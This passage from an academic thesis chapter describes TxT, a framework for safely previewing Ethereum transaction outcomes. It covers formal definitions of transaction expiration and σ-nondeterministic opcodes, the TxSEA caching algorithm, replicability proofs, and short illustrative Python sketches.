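The core idea of previewing a result without affecting the live network can be sketched in a few lines of Python. This is a deliberately reduced illustration, not the TxT implementation: the state is assumed to be a plain dictionary of balances, transactions are assumed to be simple value transfers, and the names `apply_transfer` and `encapsulate` are hypothetical. The actual system executes transactions on an instrumented, fully synchronized EVM node.

```python
import copy

def apply_transfer(state, sender, recipient, value):
    """Apply one value transfer to a balance map, failing on insufficient funds."""
    if state.get(sender, 0) < value:
        raise ValueError("insufficient balance")
    state[sender] -= value
    state[recipient] = state.get(recipient, 0) + value

def encapsulate(live_state, transfers):
    """Execute transfers on a private copy of the state and return the preview.

    The live state is never modified, which stands in for executing a
    transaction locally without propagating it to the network.
    """
    preview = copy.deepcopy(live_state)
    for sender, recipient, value in transfers:
        apply_transfer(preview, sender, recipient, value)
    return preview

live = {"alice": 10, "bob": 0}
preview = encapsulate(live, [("alice", "bob", 4)])
print(preview)  # state the user would observe after the test
print(live)     # the live state stays untouched
```

The sketch captures only the isolation aspect; deciding whether the previewed execution path can be replicated on Mainnet is a separate question that the copy-and-execute step alone does not answer.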
Overview of Transaction Testing Workflow: Fig. 5.3 shows the workflow of TxT’s transaction
testing. To test a transaction with TxT, the user first switches the Ethereum network in their
wallet and specifies a custom transaction gas price. Then, the user submits a sequence of
transactions using their favorite wallet and dApp (if applicable); no other special-purpose software
is needed. When the transaction sequence is executed, the a posteriori state will be observable in
the wallet and/or in the dApp, as if the transaction were executed on Mainnet. Next, the user
observes the status of the tested transaction (e.g., on a web page) to determine if the transaction
is testable and reproducible at any given moment.
    In some rare cases, TxT will not be able to guarantee the result of the transaction, in which
case the transaction will be labeled as σ-nondeterministic. Most σ-nondeterministic transactions
contain binary opcodes that are potentially associated with some known vulnerabilities; in this
case, TxT issues a warning about such a vulnerability. Otherwise, when the transaction is classified
as σ-nondeterministic and no vulnerability marker is present among the binary opcodes,
the transaction is deemed untestable.
    On the other hand, if the transaction is labeled σ-deterministic, it is testable and its test
result is guaranteed to be correct. In this case, the user observes the result of the transaction
(e.g., balances in the wallet) to determine whether the result matches the expectation. If
the result is unexpected, the transaction should be abandoned by the user. If the result
matches the expectation, the user needs to verify whether or not the transaction has expired, i.e.,
whether other incoming transactions have changed the state of the contract(s) during the
transaction testing. In some rare cases, TxT could determine that the test transaction has expired
by the time the user is ready to resubmit it to Mainnet. Even in such a situation, the user
can retest the transaction. Conversely, if the TxT status shows that the transaction is still valid,
the user submits the transaction to Mainnet knowing that the outcome will be identical to the one
observed during the corresponding transaction test.
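The decision flow described above can be summarized as a small Python function. The function name `next_action`, its boolean parameters, and the returned labels are hypothetical and serve only to restate the workflow; in TxT the judgment of whether the result matches expectations is made by the user, not computed.

```python
def next_action(sigma_deterministic, vulnerability_marker, result_expected, expired):
    """Return the step suggested by the transaction testing workflow.

    sigma_deterministic:  the test result is guaranteed
    vulnerability_marker: opcodes tied to a known vulnerability were found
    result_expected:      the user judges the a posteriori state as expected
    expired:              contract state changed during testing
    """
    if not sigma_deterministic:
        # No guarantee: either warn about a likely vulnerability or give up.
        return "warn" if vulnerability_marker else "untestable"
    if not result_expected:
        return "abandon"
    if expired:
        return "retest"
    return "submit"

print(next_action(False, True, False, False))
print(next_action(True, False, True, True))
print(next_action(True, False, True, False))
```

The ordering of the checks mirrors the text: determinism is established first, the user's assessment second, and expiration last, immediately before submission to Mainnet.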
5.4.2: Notation
Previous studies demonstrate that reproducing a smart contract vulnerability often requires a
sequence of two or more transactions [122, 178, 214, 223, 260]. In this work, we use notation
similar to that in [260] to denote a sequence of $N$ transactions as $T^*$:
$$T^* = (T_1, \cdots, T_N), \quad N \geq 1.$$
Furthermore, without loss of generality, we use a simplified⁴³ notation of a transaction adapted
from [113, 288]:
$$T_i = \{T_{n,i}, T_{p,i}, T_{g,i}, T_{o,i}, T_{t,i}, T_{v,i}, T_{f,i}, T_{a,i}, T_{b,i}, T_{h,i}, T_{c,i}\},$$
where $T_{n,i}$ is the transaction nonce, $T_{p,i}$ is the gas price, $T_{g,i}$ is the gas offer,
$T_{o,i}$ is the transaction sender address, $T_{t,i}$ is the transaction recipient (destination
address), $T_{v,i}$ is the transaction value (the amount of Wei sent along with the transaction),
$T_{f,i}$ is the invoked function of the smart contract, $T_{a,i}$ is the set of arguments with
which $T_{f,i}$ is invoked, $T_{b,i}$ is the block the transaction is mined into, $T_{h,i}$ is
the transaction hash, and $T_{c,i}$ is the sequence of EVM opcodes in the execution stack of $T_i$,
which recursively includes the opcode sequences of all the inter-contract calls (ICCs) executed by
the transaction. We assume that $T_i$ is properly signed.
   ⁴³ We simplify the definition by removing fields irrelevant to this study, such as the (v, r, s)
components of the transaction signature.

         Figure 5.3: Flow chart of transaction testing. (Marked steps require manual user interaction.)
5.4.3: Assumptions
A Posteriori State Assessment: Unlike traditional defense methods, TxT does not detect vulnerable
or malicious code patterns; instead, TxT reveals suspicious behavior associated with
vulnerabilities. Specifically, we make the reasonable assumption that the user can assess whether
the outcome of a series of transactions is satisfactory or not. TxT then gives the user an accurate
preview of what will happen if the given transaction sequence is executed, and the user can use the
interface of the wallet and/or the dApp to assess the a posteriori state in the form of Ether
balances, token balances, dApp interface elements, transaction error messages, etc.
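To make the notion of assessing the a posteriori state concrete, the following Python sketch compares balances before and after a test execution against a user's minimum expectations. It is purely illustrative: TxT relies on the user's own judgment through the wallet or dApp interface, and the function `assess`, the asset labels, and the numbers are all hypothetical.

```python
def assess(before, after, expected_min_change):
    """Return the assets whose balance change falls short of the expectation.

    before, after:        maps from asset name to balance
    expected_min_change:  map from asset name to the minimum expected change
    An empty result means the previewed outcome meets every expectation.
    """
    surprises = {}
    for asset, minimum in expected_min_change.items():
        change = after.get(asset, 0) - before.get(asset, 0)
        if change < minimum:
            surprises[asset] = change
    return surprises

before = {"ETH": 100, "TKN": 0}
# A purchase that takes Ether but delivers no tokens is flagged.
print(assess(before, {"ETH": 90, "TKN": 0}, {"TKN": 1}))
# A purchase that delivers tokens passes.
print(assess(before, {"ETH": 90, "TKN": 50}, {"TKN": 1}))
```

The example follows the token purchase scenario mentioned in the introduction of this chapter: the buyer expects the token balance to increase, and any preview in which it does not is treated as an unexpected outcome.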
Transaction Sequences: We assume that all transactions in the sequence represent a single com-
plete logical workflow, such that the user can unambiguously assess its success or failure. For ex-
ample, a typical token exchange workflow can be logically represented as the following sequence:
¶ sell token A for stablecoin44 S; · buy token B using stablecoin S. In this example, the user ex-
pects to observe a specific amount of B tokens in their wallet. Also, we assume that all transactions
in the sequence are distinct and sent from the same account to the same contract, i.e.,
\[
  \forall T_i, T_j \in T^{*},\ i \neq j:\ T_{o,i} = T_{o,j} \wedge T_{t,i} = T_{t,j}, \tag{5.1}
\]
where Ti , Tj are two transactions in the same sequence. We assume that the transactions in the
sequence are chronologically ordered. Since Ethereum uses incremental per-account nonces by
design [288], a testable transaction sequence must have nonces appearing in a strictly ascending
order, i.e.,
\[
  \forall T_i, T_j \in T^{*}:\ j = i + 1 \implies T_{n,j} = T_{n,i} + 1.
\]
   44 A token with market price pegged to a fiat currency (e.g., USD).
Finally, we define the requirement for Ethereum state transitions within the testable transaction
sequence:
\[
  \forall T_i, T_j \in T^{*}:\ j = i + 1 \wedge T_i \mapsto T_j \implies \nexists T_k:\ T_k \notin T^{*} \wedge T_{o,k} = T_{o,i} \wedge T_{n,k} \in [T_{n,1}, T_{n,N}], \tag{5.2}
\]
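where Ti ↦ Tj denotes an EVM state transition when transaction Tj is executed after Ti within
the sequence, and ∄Tk indicates the non-existence of any transaction Tk that satisfies the criteria
listed after it: Tk lies outside the sequence, is sent from the same account, and carries a nonce
within the nonce range covered by the sequence.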
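The sequence assumptions above (same sender and recipient, consecutive nonces, and no outside transaction from the same sender within the nonce range) can be checked mechanically. The following Python sketch is only an illustration under simplifying assumptions: the `Tx` record, the function name, and the `others` parameter (transactions not belonging to the sequence) are hypothetical and not part of TxT.

```python
from dataclasses import dataclass
from typing import Iterable, Sequence


@dataclass(frozen=True)
class Tx:
    sender: str     # T_o
    recipient: str  # T_t
    nonce: int      # T_n


def is_testable_sequence(seq: Sequence[Tx], others: Iterable[Tx] = ()) -> bool:
    """Check the sequence assumptions for a chronologically ordered sequence."""
    if not seq:
        return False
    first = seq[0]
    # Eq. (5.1): every transaction has the same sender and the same recipient.
    if any(t.sender != first.sender or t.recipient != first.recipient for t in seq):
        return False
    # Nonces must increase by exactly one between neighbors.
    if any(b.nonce != a.nonce + 1 for a, b in zip(seq, seq[1:])):
        return False
    # Eq. (5.2): no transaction outside the sequence, sent by the same account,
    # may carry a nonce inside the range [T_n,1, T_n,N].
    lo, hi = seq[0].nonce, seq[-1].nonce
    return not any(t.sender == first.sender and lo <= t.nonce <= hi for t in others)
```

For example, the sequence with nonces 5 and 6 from one account to one contract passes the check, while the same sequence fails once an unrelated transaction from that account with nonce 6 is supplied in `others`.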
On-Chain Transactions: We assume that all the transactions tested by TxT are traditional on-
chain transactions, i.e., the transactions propagated, pooled, and mined by unmodified Ethereum
nodes, such as Go-Ethereum. The Decentralized Finance (DeFi) ecosystem, which has gained significant
traction in recent years, is particularly sensitive to transaction ordering manipulation via
the widespread opportunistic extraction of Miner/Maximum Extractable Value (MEV) [30]. This
creates a pretext for transaction ordering attacks, such as the sandwich front-running attack [118]. To
alleviate the negative consequences (e.g., gas fee inflation and increased network overhead) of
MEV transactions, the Flashbots project delivers a patch (MEV-Geth [29]) for the Go-Ethereum
node that allows DeFi participants to submit transactions directly to the patched nodes, which essen-
tially creates an off-chain overlay network for transaction propagation. In this work, we consider
orthodox Ethereum transactions, and leave the MEV-related transactions for future work.
5.4.4: Threat Model
In this work, we assume that Ethereum is secure and correct on the blockchain and consensus layers,
and the honest nodes correctly implement the protocol. The threat rests on the smart contract layer,
coming either from an attacker or from a non-adversarial bug. The attacker (if present) may either
be the one who introduces a security vulnerability in the smart contract, or they may be the one
who exploits a pre-existing program bug. The attacker aims at earning financial gains or causing
disruptions to the dApps. In all cases, the attack vector is a stand-alone Ethereum node or an
Ethereum API (such as Infura or Pocket Network).
5.5: TxT: Transaction Testing Framework
In this section, we describe the challenges and details of the TxT design, and illustrate the transac-
tion testing procedure.
5.5.1: Design Challenges
Ethereum is a dynamic ecosystem where anyone in the world can deploy smart contracts or submit
transactions that compete for inclusion in constantly appended blocks. This compositional
nature of Ethereum creates a number of practical challenges described below.
Challenge #1. TOCTOU Problem: The time-of-check/time-of-use (TOCTOU) problem is man-
ifested in TxT as the combination of the transaction expiration problem and the execution path
guarantee. Our analysis of Ethereum confirms the intuitive proposition that the execution path of
a transaction does not necessarily repeat that of an identical previously-submitted test transaction.
Every test transaction may sooner or later experience an “expiration” (i.e., the outcome of the test
transaction does not match that of the real transaction), after which it no longer demonstrates a valid
outcome of an identical transaction. In this work, we determine the exact set of conditions affecting
the expiration of a test transaction, and we further design the TxSEA (Transaction State Expiration
Analyzer) algorithm, which deterministically decides whether a test transaction has expired
or not (see Section 5.5.4 for more details). Our analysis of EVM execution reveals that Ethereum
smart contracts sometimes include data sources unrelated to transaction-based state transition. For
example, the Solidity property block.difficulty, represented by the DIFFICULTY EVM opcode,
is determined by mining instead of previous transactions. We call the presence of such data sources
σ-nondeterminism. If a transaction exhibits σ-nondeterminism in its execution stack, the transac-
tion is σ-nondeterministic. In this work, we determine the exact conditions for σ-nondeterminism,
and we design TxT in a way that it unambiguously detects σ-nondeterministic transactions. Moreover,
TxT can scrutinize σ-nondeterministic transactions to provide a warning regarding specific
vulnerabilities associated with the σ-nondeterministic instructions in the contract.
Challenge #2. Execution Without Propagation: Transaction encapsulation requires that the test
transaction should only be executed on the instrumented TxT node, while being ignored by all
other nodes within the blockchain network. We show that the straw-man solutions, such as network
packet filtering or propagation suppression of the transaction, disrupt the synchronization and lead
to a stall of the node. To overcome this challenge, we propose transaction underpricing, a gas
price manipulation scheme that effectively avoids the execution of the transaction by the blockchain
network at large, without creating conditions in which the TxT node cannot re-synchronize with
the Mainnet after the test.
Challenge #3. Transaction Sequences: As demonstrated by previous studies [122, 178, 214, 223,
260], many vulnerabilities require executing a series of transactions for reproduction. To address
this challenge, we design TxT to retain the state of a soft fork for a set period of time after each
test transaction, in order to enable the execution of a sequence of transactions with an arbitrary
length. We enhance the TxSEA algorithm to determine the expiration of the entire sequence of
transactions.
5.5.2: Transaction Expiration
Determining a transaction expiration event is essential for the success of the proposed TxT tool;
otherwise, TxT cannot guarantee that the final real transaction(s) will produce the same result as
the test transaction(s). Here, we formally define the expiration conditions starting from transaction
expiration.
Definition 1: A transaction Ti is expired at block B if:
\[
  \exists T_j:\ T_{t,i} = T_{t,j} \wedge T_{o,j} \neq T_{o,i} \wedge T_{b,j} > T_{b,i} \wedge T_{b,j} \leq B. \tag{5.3}
\]
Essentially, the transaction expiration stipulates the presence of at least one transaction Tj submitted
to the same smart contract as Ti (Tt,i = Tt,j ) from a different account than Ti (To,j ≠ To,i ) at any
block time after Ti (Tb,j > Tb,i ) but before or at block B (Tb,j ≤ B). The following definition
asserts that for each block, the sets of expired and unexpired transactions are disjoint and form a
partition.
Definition 2: A transaction Ti is unexpired at block B if and only if it is not expired at block B.
    Following the definitions of transaction expiration, we define the expiration of a transaction
sequence as follows.
Definition 3: A sequence T ∗ is expired at block B if:
\[
  \exists T_i \in T^{*}\ \exists T_j \notin T^{*},\ T_{o,j} \neq T_{o,i}:\ T_{b,i} < T_{b,j} \leq B \wedge T_{t,i} = T_{t,j}. \tag{5.4}
\]
Finally, we formally define the condition for an unexpired sequence of transactions.
Definition 4: A sequence T ∗ is unexpired at block B if:
\[
  \forall T_i \in T^{*}\ \nexists T_j:\ T_{o,j} \neq T_{o,i} \wedge T_{b,j} > T_{b,i} \wedge T_{b,j} \leq B \wedge T_{t,i} = T_{t,j}. \tag{5.5}
\]
Intuitively, a transaction expiration event is characterized by the presence of another transaction
calling a function of the same smart contract after the test transaction. We assess the probability of
such an event in Section 5.6.3.
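To make the expiration definitions concrete, the following Python sketch evaluates Definition 1 and Definition 3 over an explicit list of observed transactions. It is an illustration only: the `Tx` record, the function names, and the `observed` parameter are hypothetical, and a real node would not scan transactions linearly.

```python
from dataclasses import dataclass
from typing import Iterable, Sequence


@dataclass(frozen=True)
class Tx:
    sender: str     # T_o
    recipient: str  # T_t
    block: int      # T_b


def is_expired(ti: Tx, observed: Iterable[Tx], at_block: int) -> bool:
    """Definition 1: another account called the same contract after T_i, by block B."""
    return any(
        tj.recipient == ti.recipient
        and tj.sender != ti.sender
        and ti.block < tj.block <= at_block
        for tj in observed
    )


def is_sequence_expired(seq: Sequence[Tx], observed: Iterable[Tx], at_block: int) -> bool:
    """Definition 3: some T_i in the sequence is interfered with from outside it."""
    members = set(seq)
    outside = [t for t in observed if t not in members]
    return any(is_expired(ti, outside, at_block) for ti in seq)
```

By Definition 2, a transaction is unexpired exactly when `is_expired` returns `False` for the same block.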
5.5.3: Sources of σ-nondeterminism
In order to determine all the sources of σ-nondeterminism on the Ethereum platform, we conduct an
exhaustive manual analysis of the current 145 EVM opcodes. In the end, we identify the following
set of opcodes incurring σ-nondeterminism:
                        T = {BLOCKHASH, NUMBER, COINBASE, GASLIMIT,
                        DIFFICULTY, TIMESTAMP, GASPRICE, BALANCE}.
Next, we elaborate on how these opcodes make the associated transaction σ-nondeterministic.
Block Hash: The BLOCKHASH opcode retrieves the block hash for a specified block number. Its
presence in the execution stack of a transaction is a sign that this transaction is σ-nondeterministic.
For example, if B is the most recently mined block, the BLOCKHASH opcode will return 0x0 for
B + 1 (i.e., the next block). However, once block B + 1 has been mined, the same code will return a
non-zero hash (for as long as B + 1 remains among the 256 most recent blocks). Note that the BLOCKHASH
opcode constitutes a signature of the “Weak Sources of Randomness
from Chain Attributes” (SWC-120) vulnerability.
Block Number: The NUMBER opcode retrieves the current block number. This variable constantly
increments, rendering any transaction that has this opcode in its execution stack σ-nondeterministic.
Also, this opcode is a marker for the “Block Values as a Time Proxy” (SWC-116) vulnerability.
Block Beneficiary Address: The block beneficiary address is the address specified by the winning
miner for receiving the reward. The COINBASE opcode retrieves the current block’s beneficiary
address. Since this value may be different between blocks, any transaction that uses this opcode
in its execution stack is σ-nondeterministic. Furthermore, this opcode is also a signature of the
SWC-120 vulnerability.
Block Gas Limit: Each Ethereum block has a limit on the cumulative gas consumption by all
its transactions. The GASLIMIT opcode returns the gas limit value. This value may vary from
block to block, and therefore the presence of the GASLIMIT opcode within the execution stack of
a transaction renders this transaction σ-nondeterministic. Additionally, this opcode constitutes a
signature of the SWC-120 vulnerability.
Block Difficulty: Each block has its own mining difficulty, which is calculated from the difficulty
of the previous block and the timestamp set by the miner, and therefore its specific value is volatile.
The DIFFICULTY opcode retrieves the current block’s difficulty. The variability of block
difficulty is a clear sign that the transaction with the DIFFICULTY opcode in its execution stack is
σ-nondeterministic. This opcode is yet another signature of SWC-120.
Block Timestamp: The block timestamp is a value put in the block by the miner, and it may
not necessarily represent the exact time the block was mined. A contract can retrieve the block
timestamp value using the TIMESTAMP opcode. Intuitively, the value of block timestamp is not
expected to stay the same. Therefore, the presence of the TIMESTAMP opcode in the execution
stack of a transaction is not only indicative of the SWC-116 vulnerability potential, but it is also an
indicator that the transaction is σ-nondeterministic.
Third-party Account Balance: The BALANCE opcode retrieves the balance of an account. If an
account is not in the set {To,i , Tt,i }, we call it a third-party account. In this work, we analytically
determine that a third-party account balance incurs σ-nondeterminism in smart contracts. If some
account’s balance is updated by a transaction submitted to an account other than Tt,i , it does not
render Ti expired; however, if Ti contains a BALANCE opcode in its execution stack, Ti is
marked as σ-nondeterministic.
Transaction Gas Price: The transaction gas price can be obtained via the GASPRICE opcode. Since
TxT uses transaction underpricing, the value retrieved by the GASPRICE opcode will differ between
the test transaction and the final one. Therefore, the presence of this opcode in the execution stack
of a transaction implies that this transaction is σ-nondeterministic. This opcode is another signature
of the SWC-120 vulnerability.
    Finally, by combining the above observations, we can establish the following definitions, start-
ing with the definition of a σ-deterministic transaction.
Definition 5: A transaction Ti is σ-deterministic if and only if Tc,i ∩ T = ∅.
    Since σ-deterministic and σ-nondeterministic transactions form a partition, the following defi-
nition ensues.
Definition 6: A transaction Ti is σ-nondeterministic if and only if it is not σ-deterministic.
    Similarly, we can further expand the definitions to include testing sequences.
Definition 7: A transaction sequence T ∗ is σ-deterministic if and only if all transactions in T ∗ are
σ-deterministic.
Definition 8: A transaction sequence T ∗ is σ-nondeterministic if at least one transaction in T ∗ is
σ-nondeterministic.
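Definitions 5 through 8 reduce to a set-intersection test over the executed opcodes. The Python sketch below illustrates this under the assumption that the execution trace is available as a sequence of opcode mnemonics; the function names are hypothetical. Following Definition 5 literally, any BALANCE opcode is flagged, without distinguishing third-party accounts.

```python
from typing import Iterable, List

# The set of opcodes identified above as incurring sigma-nondeterminism.
SIGMA_OPCODES = frozenset({
    "BLOCKHASH", "NUMBER", "COINBASE", "GASLIMIT",
    "DIFFICULTY", "TIMESTAMP", "GASPRICE", "BALANCE",
})


def sigma_sources(trace: Iterable[str]) -> List[str]:
    """Return the sigma-nondeterministic opcodes present in a trace, sorted."""
    return sorted(set(trace) & SIGMA_OPCODES)


def is_sigma_deterministic(trace: Iterable[str]) -> bool:
    """Definition 5: the trace shares no opcode with SIGMA_OPCODES."""
    return SIGMA_OPCODES.isdisjoint(trace)


def is_sequence_sigma_deterministic(traces: Iterable[Iterable[str]]) -> bool:
    """Definition 7: every transaction in the sequence is sigma-deterministic."""
    return all(is_sigma_deterministic(trace) for trace in traces)
```

Returning the offending opcodes from `sigma_sources` is one way a tool could attach the SWC-116 or SWC-120 warnings mentioned above to a flagged transaction.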
5.5.4: TxSEA Algorithm
Through transaction testing, TxT allows the user to peek into the a posteriori state of a transaction.
Unfortunately, the a posteriori state is transient and can expire at any moment. Due to other interfering
transactions, the execution path of the final transaction might not match that of the testing
transaction. To address this issue, we develop the TxSEA algorithm for confirming the identical
execution path when the test transaction is submitted to the current block.
  Algorithm 1: Dynamic TxSEA with Caching
    Data: The transaction expiration map E: ContractAddress ↦ LastTxBlock
    Procedure CacheTransaction(Tj ) begin
         Result: Cache the transaction currently processed by EVM and append it to the
                    permanent storage
         Input: Tj , the currently executed transaction
         E[Tt,j ] ← Tb,j ;
    Function ExpirationTest(Ti ) begin
         Result: Test transaction expiration status
         Input: Ti , the tested transaction
         Output: {Expired, Unexpired}
         if Tt,i ∉ E.Keys then
             return Unexpired;
         else if E[Tt,i ] ≥ Tb,i then
             return Expired;
         else
             return Unexpired;
    Algorithm 1 shows an efficient implementation of TxSEA using caching and dynamic programming.
This algorithm introduces a constant-time procedure CacheTransaction, which is
embedded into the instrumented Ethereum node and invoked for each executed transaction. This
procedure uses the map E to store the block number of the last transaction for each smart contract.
    The transaction data gathered from the node is stored in external storage (e.g., a database),
and this data is used by the ExpirationTest() function to determine if the transaction has expired.
This function uses the transaction expiration map to search for a transaction that might have been
recorded after Ti . The condition Tt,i ∉ E.Keys checks whether the smart contract Tt,i has
no recorded transactions; if so, the transaction is obviously unexpired. Otherwise, we check if
the block associated with the last recorded transaction was mined at or after block Tb,i (i.e.,
E[Tt,i ] ≥ Tb,i ), which indicates expiration. Finally, if the last transaction is recorded for the contract,
but it happened before Ti , the transaction is unexpired. Our experiments show that this algorithm
incurs only negligible latency (see Section 5.6.6). The requirement for the additional storage
does not need an experimental evaluation because it will always occupy a fixed 52 bytes of storage
per transaction. As of November 2022, the size of the TxSEA cache is slightly over 86 gigabytes,
which is a small fraction of the size of the full node that requires hundreds of gigabytes.
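As a rough illustration of Algorithm 1, the Python sketch below keeps the expiration map E in an in-memory dictionary. This is a sketch under assumptions, not the TxT implementation: the class and method names are hypothetical, persistence to external storage is omitted, and the sketch assumes that the test transaction itself is not recorded in the map.

```python
from enum import Enum


class Status(Enum):
    EXPIRED = "Expired"
    UNEXPIRED = "Unexpired"


class TxSEACache:
    """In-memory stand-in for the expiration map E: ContractAddress -> LastTxBlock."""

    def __init__(self):
        self._last_tx_block = {}  # contract address -> block of its last transaction

    def cache_transaction(self, recipient: str, block: int) -> None:
        """CacheTransaction: constant-time update, E[T_t,j] <- T_b,j."""
        self._last_tx_block[recipient] = block

    def expiration_test(self, recipient: str, test_block: int) -> Status:
        """ExpirationTest: compare the last recorded block with the test block T_b,i."""
        last = self._last_tx_block.get(recipient)
        if last is None:
            return Status.UNEXPIRED          # no transaction recorded for this contract
        if last >= test_block:
            return Status.EXPIRED            # a transaction arrived at or after T_b,i
        return Status.UNEXPIRED              # last transaction predates the test
```

Both operations are single dictionary accesses, which is consistent with the constant-time behavior described for the cached variant.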
5.5.5: How Does TxT Guarantee the Transaction Execution Path?
In the previous section, we demonstrate the cases in which TxT cannot guarantee that the execution
path of the final Mainnet transaction remains the same as that of the test transaction. Here, we
confirm that, with all the uncertain cases eliminated, the identical path execution can be guaranteed.
So far, we have been using a loose notion of transaction execution, which does not take into account
the state of blockchain the transaction applies to. Following the Ethereum state transition model
from [288], we can give a formally precise definition of the state-conditional execution
path as follows.
Definition 9: A state-conditional execution path, denoted Ti |σi , is the state transition σi → σi′ ,
such that σi′ = Υ(σi , Ti ), where Υ is the deterministic state transition function in EVM.
Definition 10: A state of contract Tt,i , denoted σt,i , is a subset of state values in σi (i.e., σt,i ⊆ σi ) that
encompasses only storage and balances associated with all contracts in the call stack of transaction
Ti .
Definition 11: A contract-state-conditional execution path with respect to contract Tt,i , denoted
Ti |σi |Tt,i , is the state transition σt,i → σ′t,i , such that σ′t,i = Υ(σt,i , Ti ).
     Now that we have formal definitions of state-conditional execution path, contract state, and
contract-state-conditional execution path, consider the following theorem, which formalizes the
exact condition of replicability of a transaction execution path.
Theorem 1: Given two transactions Ti and Tj , if Tn,i = Tn,j , Tg,i = Tg,j , To,i = To,j , Tt,i =
Tt,j , Tv,i = Tv,j , Tf,i = Tf,j , Ta,i = Ta,j , Tc,i = Tc,j , Tc,i ∉ T , and Ti is not expired at block Tb,j ,
then Ti |σi |Tt,i = Tj |σj |Tt,j , i.e., Tj exhibits an identical execution path as Ti within the call stack
of Tt,i and conditional to states σj and σi , respectively, for all j > i.
Proof: By definition, Ti |σi |Tt,i = Tj |σj |Tt,j ⟹ σ′t,i = σ′t,j ⟹ Υ(σt,i , Ti ) = Υ(σt,j , Tj ). Since
Υ is deterministic, σ′t,i depends solely upon σt,i and Ti , while σ′t,j depends solely upon σt,j and Tj .
    As per Ethereum and EVM specifications [20, 21, 288], the execution of a transaction calling
a function of a smart contract is determined only by the following four components: 1) the code
of the smart contract, as well as the code of the other contracts invoked within the call stack of
the transaction; 2) the storage of the target smart contract, as well as the storage of all contracts
within the call stack of the current transaction; 3) balances of smart contracts and EOAs; 4) block-related
values. Next, we prove that none of these components could prevent Tj , applied to σt,j ,
from executing exactly the same path as Ti , when applied to σt,i , while satisfying the Theorem’s
constraints.
    Since Tc,i = Tc,j , the code of all contracts in the call stack is identical, and therefore this com-
ponent is incapable of creating a discrepancy between Ti |σi |Tt,i and Tj |σj |Tt,j . As per Definitions
1 and 2, the pre-condition that Ti is not expired at block Tb,j implies that Tt,i has no incoming
transactions from other accounts between blocks Tb,i and Tb,j , i.e.:
\[
  \nexists T_k:\ T_{o,k} \neq T_{o,i} \wedge T_{b,k} > T_{b,i} \wedge T_{b,k} \leq T_{b,j} \wedge T_{t,i} = T_{t,k}. \tag{5.6}
\]
Since Tc,i = Tc,j and the contract storage can only be altered through an incoming transaction,
Eq. (5.6) effectively eliminates contract storage discrepancy between states σt,i and σt,j . Therefore,
contract storage cannot create a discrepancy between Ti |σi |Tt,i and Tj |σj |Tt,j .
    Similarly, altering a contract’s balance is only possible through transactions, mining, or self-
destruction. Specifically, the balance increase requires a transaction calling a payable function with
a non-zero value. The balance decrease requires a transfer of Ether performed by the smart contract
code. The mining reward involves updating of the coinbase parameter of the block, which makes it
a block-related parameter as discussed later. The self-destruction is only possible by executing the
SELFDESTRUCT opcode in the smart contract code initiated via a transaction. Therefore, Eq. (5.6)
also excludes any balance transfer. Moreover, since Tc,i ∉ T , the balance checks for other accounts
are also excluded. Therefore, balances also could not create a discrepancy between Ti |σi |Tt,i and
Tj |σj |Tt,j . Finally, all block-related values are included in T . As established earlier, Tc,i = Tc,j ,
and thus Tc,i ∉ T ⟹ Tc,j ∉ T . Therefore, block values cannot create a discrepancy between
Ti |σi |Tt,i and Tj |σj |Tt,j under the set constraints.
      In summary, we see that the code of the transaction call stack, the storage of the target smart
contract and all contracts within the call stack of the current transaction, balances of smart con-
tracts and EOAs, and block-related values are unable to create a discrepancy between Ti |σi |Tt,i and
Tj |σj |Tt,j . Therefore, Ti |σi |Tt,i ≡ Tj |σj |Tt,j . ■
      The set of constraints in Theorem 1 is a sufficient condition for guaranteed replicability of
a test transaction, which is used by TxT and TxSEA. Specifically, we prove that σ-deterministic
unexpired transactions guarantee the replicability of a testing transaction execution path.
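The preconditions of Theorem 1 can be read as a checklist. The Python sketch below encodes them as a single predicate; it is an illustration with hypothetical names, and it takes the expiration verdict as an input rather than computing it. Note that the gas price is deliberately absent from the compared fields, since the test transaction is underpriced while the final one is not.

```python
from dataclasses import dataclass
from typing import Tuple

SIGMA_OPCODES = frozenset({
    "BLOCKHASH", "NUMBER", "COINBASE", "GASLIMIT",
    "DIFFICULTY", "TIMESTAMP", "GASPRICE", "BALANCE",
})

# Fields that Theorem 1 requires to be equal (T_n, T_g, T_o, T_t, T_v, T_f, T_a, T_c).
COMPARED_FIELDS = ("nonce", "gas", "sender", "recipient",
                   "value", "function", "args", "opcodes")


@dataclass(frozen=True)
class Tx:
    nonce: int
    gas: int
    sender: str
    recipient: str
    value: int
    function: str
    args: Tuple
    opcodes: Tuple[str, ...]
    gas_price: int = 1  # T_p: not compared by the predicate below


def satisfies_theorem1(test_tx: Tx, final_tx: Tx, test_tx_expired: bool) -> bool:
    """True if the final transaction is guaranteed to repeat the test execution path."""
    fields_match = all(
        getattr(test_tx, name) == getattr(final_tx, name) for name in COMPARED_FIELDS
    )
    sigma_deterministic = SIGMA_OPCODES.isdisjoint(test_tx.opcodes)
    return fields_match and sigma_deterministic and not test_tx_expired
```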
5.5.6: Temporal Separation of Transactions
Some smart contracts force transaction separation by a time gap. For example, an investment
scheme might require a delayed withdrawal of dividends. In this work, we analytically determine
that it is impossible to enforce time separation without incurring σ-nondeterminism or transaction
sequence expiration, which we can summarize in the following theorem.
Theorem 2: Inter-transaction time separation stipulation in a sequence T ∗ implies that T ∗ is σ-
nondeterministic or it is bound to expire before block Tb,N .
Proof: The time separation stipulation means that it is impossible to complete the transaction se-
quence without awaiting a certain event or condition between a pair of subsequent transactions.
Without loss of rigor, we assume that the minimum inter-transaction separation time quantum
is equal to one block⁴⁵. This reduction allows us to define the transaction time separation stipulation
as follows:
\[
  \exists T_i, T_j \in T^{*}:\ T_{b,i} = \alpha \wedge T_{b,j} = \beta \wedge T_{n,j} = T_{n,i} + 1 \implies \beta > \alpha.
\]
   45 On average, it takes 10 to 20 seconds in Ethereum to mine a new block.
This condition is indicative of one of the following three circumstances regarding Ti and Tj :
1) The cumulative gas consumption of Ti and Tj exceeds the block’s gas limit; 2) There is at
least one other transaction Tk expected before the block α; 3) The state of blockchain σ must
meet a certain condition before α. Indeed, outside of these three conditions, there is no other
circumstance preventing Ti and Tj with different nonces from sharing a block. The first condition is
automatically prevented by Ethereum by mining one of the transactions in one of the following
blocks, but this adaptive behavior is not stipulated because the block size is variable and may or
may not exceed the cumulative gas consumption of Ti and Tj . The second case precisely matches
Definition 3, and therefore incurs the expiration of sequence T ∗ . The third case satisfies Definition
6 (and subsequently Definition 5) — which means that in this case Ti is σ-nondeterministic, and by
Definition 8 it means that T ∗ is σ-nondeterministic. Therefore, the inter-transaction time separation
implies either σ-nondeterminism or expiration of T ∗ . ■
Corollary of Theorem 2: If a transaction sequence requires a time separation between transac-
